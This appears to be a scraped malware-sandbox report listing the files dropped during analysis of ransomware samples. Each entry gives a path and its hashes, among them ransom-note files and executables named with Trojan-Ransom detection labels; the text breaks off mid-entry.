                                                                                                                                                                                                                                                                                            583df866b15b9f1b9872827c17560448735a278df7457ad863f7f1fd11c87190

                                                                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                                                                            fa7367decb6d12f2d5c5d6e17180a7842d3fdf1a4a2349f699de4d2cdcc6f9a6b016d3fa44056ba453eafb0eb07f7df69cc800d195633c89009c252c13f9b4b0

                                                                                                                                                                                                                                                                                            Download Submit

                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\App\Bandizip\icons\default\lha.ico
                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                            31KB

                                                                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                                                                            43e2409c9c0586fe3c1f2027e458cc36

                                                                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                                                                            8585a4d717777ce10d08422acd75603283d05ac3

                                                                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                                                                            469df2b707ea7fc53c469c21719f8ff64359dad4ee0a277fa6052572a61c1d10

                                                                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                                                                            8d397a342118b98a53f37be73ad9cc165b98deb786b6f552dbef868e84599f6b1a553c816fb073d000027c99c6757d7b4f2fa10f3fef942a8e1ef52e29b2221a

                                                                                                                                                                                                                                                                                            Download Submit

                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\App\Bandizip\icons\default\lzh.ico
                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                            31KB

                                                                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                                                                            6b678bfd89a1605e05512c0fc26d4ada

                                                                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                                                                            f873b4a92ba9cea7065f966e38c7b7cb5cc1a21a

                                                                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                                                                            2d0c9bc2a13f90f60ed6927c9dadc20d6673477a80d674698e63848c2ad893e2

                                                                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                                                                            4d6dbb85720c676ae547b8bdf2ac121d02b949c7cb7ee7992cc86ca16f7887be9cf04b4c24ca9953fc6b81bed8f1ac4fb38a6cb332e92f8fdccecda0b2dc52ec

                                                                                                                                                                                                                                                                                            Download Submit

                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\App\Bandizip\icons\default\rar.ico
                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                            31KB

                                                                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                                                                            d59a636f8c49d3c6953f5922c0e95afa

                                                                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                                                                            a29fd886c6ece1c32533c718177f0f8a4bf851cd

                                                                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                                                                            690ae61424c5e32ea9969980b6dbe83704113a08cb3aa70e7258a1152c53c626

                                                                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                                                                            aa9d93dbef00804982facf3969d5c84e3268fb212ca1125ea9e36ec5ccc9da661b7aabde27e05a66cb3a167f862585d1027a9caaa57d165bf1bfa60fa2f0c404

                                                                                                                                                                                                                                                                                            Download Submit

                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\App\Bandizip\icons\default\tar.ico
                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                            31KB

                                                                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                                                                            833f8b4484be8db7fad77e3bbbc21f8b

                                                                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                                                                            f33330b3a7740c589e85cee5d58b05cb47e91277

                                                                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                                                                            784e2d0247a127a1e4d451a7ad0567ce7d68eb3d81cddbaec8cd71a1703231ca

                                                                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                                                                            4a3f4c8d512a242ad23deea36f17414edfba51c4a19ba4a2183638e9faa98c4e23ae33c80ee0cc0af53611ffd322b1e7817ec3f7b25757d56a6ed80373dce31f

                                                                                                                                                                                                                                                                                            Download Submit

                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\App\Bandizip\icons\default\tbz.ico
                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                            31KB

                                                                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                                                                            5533e443b74a33a5b1dd4bf60b71de17

                                                                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                                                                            4ef9235fac0fc11e3d657ac6a91f77e734e3bcc2

                                                                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                                                                            68cf09e778771f45cdea7518b9e2d0e48c5345bdb5bf8f2e980a26dac6fccee4

                                                                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                                                                            8816af22cf4f87cf8af6378a218d26e83128989be7af8cfab34f5e50e571a99b3bf9f26dab8ecf16f58bceaa620ccdf87b6dccabe5a93ff5cd492aca7c3e837c

                                                                                                                                                                                                                                                                                            Download Submit

                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\App\Bandizip\icons\default\tbz2.ico
                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                            31KB

                                                                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                                                                            5cb23fa7d613f4c00306ae48688e16da

                                                                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                                                                            5696635df2abed49a667d136f981ce02ef6ce90a

                                                                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                                                                            545b2bd9e40c24b4df3d84d8d4da4642ba920c329cb01236672f727eb2760457

                                                                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                                                                            70ddf639ae572d0bc08bfae5e3103ae329a42c6c7e3a13b616a31ac93a33661bd4f14bb3c856df4f34c9b725542ad170ff49fb01d37c41c09f9193a608b99564

                                                                                                                                                                                                                                                                                            Download Submit

                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\App\Bandizip\icons\default\tgz.ico
                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                            31KB

                                                                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                                                                            55c7fad482ae17d53a5814e02320516d

                                                                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                                                                            4cc4fd3d5a8787e599d99f7d05429c53e59ddbf3

                                                                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                                                                            9ef2d406ac0875cc62f4ffa4270f1ddf532d9114be269c58ed4fbeee84f7aa06

                                                                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                                                                            3598880de90aa925423b45f6755314a5c6363e24a037fcc8ba319235cb3704ea3ae9bc9b11b2abf5ecab69a458c3975f057f54aa5aa4cc4385510a1f19a87b97

                                                                                                                                                                                                                                                                                            Download Submit

                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\App\Bandizip\icons\default\xz.ico
                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                            31KB

                                                                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                                                                            75bedc749c564f77c55fe4e0bbefb829

                                                                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                                                                            dea09ca3e8666c7d77f652755a9c8eed3be434eb

                                                                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                                                                            e1c052740da8afec62a69c0619ba2b75644e380e09884a64606ef9d597dfd821

                                                                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                                                                            2b72c6aac417b5613277e944617addd36534906f51dbca72b026fd35d821c128dccb167aae497fbc83380fc5d13086186194f373aea57b5958d6790a0e167da9

                                                                                                                                                                                                                                                                                            Download Submit

                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\App\Bandizip\icons\default\zip.ico
                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                            31KB

                                                                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                                                                            3a5146b90e31d056e25695f106dc3dcc

                                                                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                                                                            548ed5242efadf02b45a1779b6cca017c9fb8fc7

                                                                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                                                                            045d1e2444d3288e14445fa4b39ec267faa424e2105d4a832883f2c017333507

                                                                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                                                                            ff97f73a2352297cb02fd876db5a909c77a8d1de11a98c4a61d6fbd5f04abae5189d9af102e2e12c90c51ce325274c6c0112b4a1cab74b0250b0a98c3d7a5d92

                                                                                                                                                                                                                                                                                            Download Submit

                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\App\Bandizip\icons\default\zipx.ico
                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                            31KB

                                                                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                                                                            860f29038a7cfcbaaeeeaafd08703f2a

                                                                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                                                                            93d4eca32a5aff6b03f0c8268801539a2ba118ca

                                                                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                                                                            a1c4241cf87d540aadf55c46cad276efb2414ea3d68e527066f12c2a2e85a392

                                                                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                                                                            e3a47d5cdee2879d2d6004ba28e06c654f151bd25eaa749cb675aad34c7233f7614d8f81ee245557da504a03ff1ec2acb7f6d85642e3c76bddf582f39943541f

                                                                                                                                                                                                                                                                                            Download Submit

                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\BandizipPortable.exe
                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                            220KB

                                                                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                                                                            27e1426df200d1f62381a94be8a723d6

                                                                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                                                                            bd719aef81b85200f5582ee139270cfb0f5397c4

                                                                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                                                                            c3206fab5ddba32622924052c99b08e417dc2becaa0c67e96e323a61bac61dd8

                                                                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                                                                            3380e1d01e1bc1a019b3ccb6c95f6e1879aab4e80c14af9f8dda85ca56a44c810aa317630021e433419b34995f3654e2d19d4d89c7e3f82a8f9911ed74856434

                                                                                                                                                                                                                                                                                            Download Submit

                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\7c87a65c-f3c7-42c8-baf0-4ccb8da95ac8\AgileDotNetRT64.dll
                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                            141KB

                                                                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                                                                            11f1f9a367de7093bbb3a95ab5373e03

                                                                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                                                                            2282a0607c840be6fb2b6bbfb9da9eb6e237b35f

                                                                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                                                                            557a7437f75b54ab49cc7579de23160ed30f0db61ef0d66501f3802cb3a0a3db

                                                                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                                                                            a26f0d59f1589fff35fc1f37e1ab459e10fd6c820965a35fe5830265434b103cb60e7026a4f85412f14c133284085f3b66f7fb27964166b67a5d75b474141225

                                                                                                                                                                                                                                                                                            Download Submit

                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\FB_18F9.tmp.exe
                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                            3.5MB

                                                                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                                                                            7e18384b73202f0f9d1623fe159a8483

                                                                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                                                                            9c6e26df54c9ddb73269b3bc7c76066889e4e2a7

                                                                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                                                                            7c534833adb9a9aa4a21112984824df119a7f6afb8e9cb61fb9eaecd123785b0

                                                                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                                                                            9616dcd47e7b26c209f0d52949debc8cc53556b3a6a79e120c16e8598f42722769481365b5017e9c2d62461abe163766dcf71021d6f2eb3dc372a955470072c8

                                                                                                                                                                                                                                                                                            Download Submit

                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\FB_BD.tmp.exe
                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                            48KB

                                                                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                                                                            21384918285a88499d22a8795c4e1467

                                                                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                                                                            6d0d99794dc52863e321c95564343c4b921b656b

                                                                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                                                                            86126f7939cbb4da5cd5b4679e7b1389d6322c205a353825da47799c656f31c5

                                                                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                                                                            93481282816e0bfa4cc2ec0dd92f25b4c00e7cb5139bfe684857c152721e4dd0bc61eecd576a861769c9e3a34b165e89b030bea11434c242f50dd5caf3c17205

                                                                                                                                                                                                                                                                                            Download Submit

                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_jo3vzemi.2ia.ps1
                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                            60B

                                                                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                                                                            d17fe0a3f47be24a6453e9ef58c94641

                                                                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                                                                            6ab83620379fc69f80c0242105ddffd7d98d5d9d

                                                                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                                                                            96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                                                                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                                                                            5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                                                                                                                                                                                                                                                                                            Download Submit

                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\aut22A9.tmp
                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                            239KB

                                                                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                                                                            29e1d5770184bf45139084bced50d306

                                                                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                                                                            76c953cd86b013c3113f8495b656bd721be55e76

                                                                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                                                                            794987c4069286f797631f936c73b925c663c42d552aeca821106dfc7c7ba307

                                                                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                                                                            7cb3d0788978b6dc5a78f65349366dac3e91b1557efa4f385984bef4940b3ea859f75cfe42c71f6fe445555138f44305531de6a89c5beff4bf9d42001b4348e8

                                                                                                                                                                                                                                                                                            Download Submit

                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\nsg71C.tmp\System.dll
                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                            11KB

                                                                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                                                                            a4dd044bcd94e9b3370ccf095b31f896

                                                                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                                                                            17c78201323ab2095bc53184aa8267c9187d5173

                                                                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                                                                            2e226715419a5882e2e14278940ee8ef0aa648a3ef7af5b3dc252674111962bc

                                                                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                                                                            87335a43b9ca13e1300c7c23e702e87c669e2bcf4f6065f0c684fc53165e9c1f091cc4d79a3eca3910f0518d3b647120ac0be1a68eaade2e75eaa64adfc92c5a

                                                                                                                                                                                                                                                                                            Download Submit

                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\olex.jpg
                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                            11KB

                                                                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                                                                            e7285121adf3ff4ca875ead987bcae79

                                                                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                                                                            469183af23e21db61186b761ca5818adfb5df078

                                                                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                                                                            a228c3faa1af24f858c9491f1d823fdcfee8adef0dfa9808f66d6273a1a5d532

                                                                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                                                                            d62e8d9dfa3dab1020d9f5668a266f839baa30dff19388d01afb5ecca3a3f91a54f66aa57e03bf0537b506c8545a1373d0f25c517b2222820617e877345faf1e

                                                                                                                                                                                                                                                                                            Download Submit

                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\xc1.ico
                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                            25KB

                                                                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                                                                            034c268ffc3a63db99ef0fe66c14a4e4

                                                                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                                                                            9a5383e44a6f7948f7a3c8757e2c2d2e3a9e9260

                                                                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                                                                            17a46eb6076eee70791d378ef29c1c2da61725b51c63242626cc5d93f2219178

                                                                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                                                                            8d197a9ee2282de36958fa6d083341558368187aeced18ef07d263e600313b023f6637671fb30ec236d951d7522ce9e307b3d099b113c7cec45c2599f5935769

                                                                                                                                                                                                                                                                                            Download Submit

                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\svchost.exe
                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                            594KB

                                                                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                                                                            49eb5ad0f4aa1ad6073fe52dc4785625

                                                                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                                                                            246b24a981fc8ad220d406c503700548f35de38d

                                                                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                                                                            1b6b6676afb83d4633a15b1f18301c6523ec7cfbd76d1befe8f82fd6c729cb76

                                                                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                                                                            0631a511c65f1d76433fe1db2236571f59b1746c0ef57bd323fb55e33f9e5764740476a209cffb6e55aa20afe64de4ca5c1abd2087837a2011274315958ffff5

                                                                                                                                                                                                                                                                                            Download Submit

                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Roaming\at\# DECRYPT MY FILES #.html
                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                            19KB

                                                                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                                                                            26862916be2e9865554381bfb28ea1f4

                                                                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                                                                            ab8db68f37ddaf018ae37fba2e063826dd1029b9

                                                                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                                                                            9541a19534bd4d6e44542d061b997232a3f967aaa6854906faff265679546e46

                                                                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                                                                            84facd2ece0e592e9fec99c9a529dd3cd7495a7ab5577e5fe468434ce9756bda8357ae01c9069d9286cb4c1632774fbf9f79aec005f0e0e53fec046cd44ec2c1

                                                                                                                                                                                                                                                                                            Download Submit

                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Roaming\at\# DECRYPT MY FILES #.txt
                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                            10KB

                                                                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                                                                            bfd65f772d1ac681bae51126fbcfd7cb

                                                                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                                                                            b8dfce38c2fa52f23333abc9c6dc49c9f8f25f37

                                                                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                                                                            a497e7639cc73d1abd82db754c36effa3546ebc4c27875ebc3fdfd1df8c3c080

                                                                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                                                                            630017f0e4c2e18f11d94a160cc815efe52a8b0d9014788b991665a1169f6eaaa01df9c957b58943f761089103a89232e32e0a1a65531168fec5b7bf701c4bfc

                                                                                                                                                                                                                                                                                            Download Submit

                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Roaming\at\# DECRYPT MY FILES #.url
                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                            88B

                                                                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                                                                            e142d1c37bd6bd02111ab66d4d58af2f

                                                                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                                                                            0d5b1a08c43913443e3fc72b9046e7a063748c8f

                                                                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                                                                            22c693e21a91bc557646e26f392efab8bc8a47b4e43c6bf288d2f26bb2e96fcd

                                                                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                                                                            2863b82690319288fe1b1a1906b14071bc310d3ba906a1695fde3072eb972b448c6807cbb880810c855415047ab454abf8823fa23a520cf072159fb1fdeee3b7

                                                                                                                                                                                                                                                                                            Download Submit

                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Roaming\at\# DECRYPT MY FILES #.vbs
                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                            213B

                                                                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                                                                            1c2a24505278e661eca32666d4311ce5

                                                                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                                                                            d1deb57023bbe38a33f0894b6a9a7bbffbfdeeee

                                                                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                                                                            3f0dc6126cf33e7aa725df926a1b7d434eaf62a69f42e1b8ae4c110fd3572628

                                                                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                                                                            ce866f2c4b96c6c7c090f4bf1708bfebdfcd58ce65a23bdc124a13402ef4941377c7e286e6156a28bd229e422685454052382f1f532545bc2edf07be4861b36c

                                                                                                                                                                                                                                                                                            Download Submit

                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Roaming\{73E2C040-E79E-C111-12FC-85EE17911C8A}\ReAgentc.exe
                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                            270KB

                                                                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                                                                            1e97fda428488834e73a9d21f45905ca

                                                                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                                                                            349780006801787b966a14ff7b9b7d5d0872feb6

                                                                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                                                                            28b28111884badedf0870be7bef1e417b3ddea12eb06b1c431e992be39d6bf8e

                                                                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                                                                            5e6848598bb9e51df29237e3154a1f271b4b6ccb474f34c0bfbc0682a53d2e41c84214a1405d63e85dcaee95e83049a465d58ede46a6d1a1324eaf3a13a19fb9

                                                                                                                                                                                                                                                                                            Download Submit

                                                                                                                                                                                                                                                                                          • C:\Users\Admin\Desktop\00402\HEUR-Trojan-Ransom.MSIL.Blocker.gen-5054cdfd0f9c2501bf96ae23cc771dcbdf6beeba07e7cbe7520f76473b21d392.exe
                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                            460KB

                                                                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                                                                            0e23d2a4da9c2c8b28e9e12d674ef790

                                                                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                                                                            22386fe8e8db841e63fb2701ef945b7f5ddf1472

                                                                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                                                                            5054cdfd0f9c2501bf96ae23cc771dcbdf6beeba07e7cbe7520f76473b21d392

                                                                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                                                                            91984a1dd0a403355eff62819e656ad5a90a14be28459b3e600233aa4970718fbd441c979cbc8938dc13b0b5f98eb8577311c4292dfdad4c9a2074476358ea1c

                                                                                                                                                                                                                                                                                            Download Submit

                                                                                                                                                                                                                                                                                          • C:\Users\Admin\Desktop\00402\HEUR-Trojan-Ransom.Win32.Blocker.gen-4e665ab21ff5a1d2b69bef16b37c98dc1bb502382213de23cb2a9254c7779c72.exe
                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                            3.6MB

                                                                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                                                                            0cc6659c10192fce2006471e0543f0bf

                                                                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                                                                            4d7d6f000779a78a70b865abce81594fe3370cd0

                                                                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                                                                            4e665ab21ff5a1d2b69bef16b37c98dc1bb502382213de23cb2a9254c7779c72

                                                                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                                                                            83d06454b3f57e7fda63a85ed32c75adcf532fcc88a834f125139959c3ebbf93386fc6585a23006470eff0598c4cd03b098257131bfbaaae3626a7148d72fdfa

                                                                                                                                                                                                                                                                                            Download Submit

                                                                                                                                                                                                                                                                                          • C:\Users\Admin\Desktop\00402\HEUR-Trojan-Ransom.Win32.Crypmod.vho-f449cb60b185851cba27420b3f959c88cf121838157bc33918e8c7bffd8b7cc3.exe
                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                            4.6MB

                                                                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                                                                            549a054febba09e353897286de88eef7

                                                                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                                                                            66b6fcc0477cc3c5e2af6d9bdc41274ad57edb13

                                                                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                                                                            f449cb60b185851cba27420b3f959c88cf121838157bc33918e8c7bffd8b7cc3

                                                                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                                                                            7154e23e3111619f90115b1959be10031294e1ca5a9649a2ada121e3be67a27450e500f035ebd36e4600063ac5eb9aae18215fad4a32a0d78303c5e9f4eea1bc

                                                                                                                                                                                                                                                                                            Download Submit

                                                                                                                                                                                                                                                                                          • C:\Users\Admin\Desktop\00402\HEUR-Trojan-Ransom.Win32.Crypren.gen-ae32afd2b186415adad6cf452334a8daf1e2a5f918772dc8b178629b0bc5921b.exe
                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                            580KB

                                                                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                                                                            86099884fc9a5298c7dd79cc4c94547c

                                                                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                                                                            e4602e932e12fc7988c8e41f6198b23255dfcbb7

                                                                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                                                                            ae32afd2b186415adad6cf452334a8daf1e2a5f918772dc8b178629b0bc5921b

                                                                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                                                                            b917d002a9843406b62ea58bdced1b6a37a99a4e5354df8492692dd75b04eb9a83f06e95b4579c6953eef46e06634b15a21e91399199ab515956886029dc9d20

                                                                                                                                                                                                                                                                                            Download Submit

                                                                                                                                                                                                                                                                                          • C:\Users\Admin\Desktop\00402\HEUR-Trojan-Ransom.Win32.Encoder.gen-0ccb966a94a1f2864f483fd2cdb69fa4132dd9faf25ee6f2dfaeaba04cfb7920.exe
                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                            1.5MB

                                                                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                                                                            f8fb24d1d5d636d13744a93215af863f

                                                                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                                                                            5fb737f9ad3b98fafc456c6f278322af96703a49

                                                                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                                                                            0ccb966a94a1f2864f483fd2cdb69fa4132dd9faf25ee6f2dfaeaba04cfb7920

                                                                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                                                                            607a2a3678960ad08a6b3f1ba1c22dc5d626da6129e2ef430a377cf7058ca3fa2561ee386128154f0b183b5e8dd42dca7ff92850741693e370fef493c89354fe

                                                                                                                                                                                                                                                                                            Download Submit

                                                                                                                                                                                                                                                                                          • C:\Users\Admin\Desktop\00402\HEUR-Trojan-Ransom.Win32.GandCrypt.gen-7a17bc2c51be7c31dd61dce4a5f9fe707a987e7399a668d7fe15d3630d538849.exe
                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                            325KB

                                                                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                                                                            1d1c174fefa9c869380d26eb5bfdc45f

                                                                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                                                                            7545950ffc65957b8639567d32ef6b769ee89fd2

                                                                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                                                                            7a17bc2c51be7c31dd61dce4a5f9fe707a987e7399a668d7fe15d3630d538849

                                                                                                                                                                                                                                                                                            SHA512

